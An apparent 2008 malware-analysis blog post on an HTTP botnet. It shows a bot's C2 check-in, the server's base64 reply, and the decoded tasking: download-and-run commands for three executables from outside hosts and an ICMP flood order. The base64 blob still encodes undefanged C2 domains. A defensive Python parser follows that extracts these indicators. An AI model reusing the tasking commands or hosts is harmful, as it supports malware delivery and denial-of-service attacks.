HTTP-based Botnets
Saturday, June 7. 2008
We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:
POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E
The answer from the server is:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0
The response is base64-encoded and decoding leads to the following (obfuscated) commands:
10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;
Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.
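For analysts who want to turn a capture like the one above into structured data, the following Python script is an added example (not CWSandbox output and not the bot's own code). It recognises the beacon shape shown in the post (a POST whose form body carries id and build_id), reassembles the chunked response body, base64-decodes it, and splits the tasking into the numeric parameter block before the '#', the 'get' download URLs and the 'flood' command. The sample response is constructed here with .invalid placeholder hosts instead of the real ones; the names beacon_fields, dechunk and decode_tasking are this example's, and treating the number after the flood target as a rate/intensity value is an assumption, since the post does not say what it means.

```python
from __future__ import annotations

import base64
from dataclasses import dataclass, field
from urllib.parse import parse_qs


@dataclass
class C2Tasking:
    parameters: list[int] = field(default_factory=list)   # numeric block before '#'
    downloads: list[str] = field(default_factory=list)    # URLs from 'get' commands
    floods: list[tuple[str, str, str]] = field(default_factory=list)  # (proto, target, value)
    other: list[str] = field(default_factory=list)        # unrecognised commands, kept verbatim


def split_http(raw: bytes) -> tuple[bytes, bytes]:
    """Split a raw HTTP message into (head, body) at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def beacon_fields(request: bytes) -> dict[str, str] | None:
    """Return {'id': ..., 'build_id': ...} if the request looks like the check-in
    seen in the post (POST, form-encoded body with both keys), else None."""
    head, body = split_http(request)
    request_line = head.split(b"\r\n", 1)[0]
    if not request_line.startswith(b"POST "):
        return None
    if b"application/x-www-form-urlencoded" not in head.lower():
        return None
    fields = {k: v[0] for k, v in parse_qs(body.decode("ascii", "replace")).items()}
    return fields if {"id", "build_id"} <= fields.keys() else None


def dechunk(body: bytes) -> bytes:
    """Reassemble a 'Transfer-Encoding: chunked' body: <hex size>CRLF<data>CRLF ... 0CRLF."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0].strip(), 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        start = end + 2
        out += body[start:start + size]
        pos = start + size + 2  # skip the CRLF that terminates the chunk data


def decode_tasking(body: bytes) -> C2Tasking:
    """Decode the base64 tasking and parse it in the layout the post shows:
    numbers separated by ';', then '#', then ';'-separated commands."""
    plain = base64.b64decode(dechunk(body)).decode("ascii", "replace")
    head, _, tail = plain.partition("#")
    tasking = C2Tasking(parameters=[int(x) for x in head.split(";") if x])
    for cmd in tail.split(";"):
        cmd = cmd.strip()
        if not cmd:
            continue
        verb, _, arg = cmd.partition(" ")
        if verb == "get":
            tasking.downloads.append(arg)
        elif verb == "flood":
            proto, _, rest = arg.partition(" ")
            parts = rest.split("#")  # observed as 'target#10#'; value meaning is an assumption
            tasking.floods.append((proto, parts[0], parts[1] if len(parts) > 1 else ""))
        else:
            tasking.other.append(cmd)
    return tasking


# Constructed sample request, mirroring the one in the post (host already defanged there).
_REQ_BODY = b"id=xMACHINENAME_0&build_id=1362B8E"
SAMPLE_REQUEST = (
    b"POST /ddd/stat.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: life-tablets.xxx\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_REQ_BODY)
) + _REQ_BODY

# Constructed plaintext tasking with placeholder hosts; same layout as the decoded response.
SAMPLE_PLAIN = (
    "10;2000;10;1;0;30;100;3;20;1000;2000#"
    "get http://c2-one.invalid/lf/e/i.exe;"
    "get http://c2-one.invalid/lf/e/1000.exe;"
    "get http://c2-two.invalid/lf/load.exe;"
    "flood icmp victim.invalid#10#"
)


def build_sample_response() -> bytes:
    """Wrap SAMPLE_PLAIN as a base64 payload in a chunked HTTP/1.1 response."""
    b64 = base64.b64encode(SAMPLE_PLAIN.encode())
    return (
        b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n"
        b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n"
        + b"%x\r\n" % len(b64) + b64 + b"\r\n0\r\n\r\n"
    )


if __name__ == "__main__":
    print("beacon:", beacon_fields(SAMPLE_REQUEST))
    print(decode_tasking(split_http(build_sample_response())[1]))
```

Run stand-alone it prints the parsed beacon fields and the structured tasking; in practice the same functions can be pointed at request and response bodies pulled from a sandbox PCAP, and the three parsed lists map directly onto the indicators worth blocking: the download URLs, the flood target, and the beacon path with its id/build_id form keys.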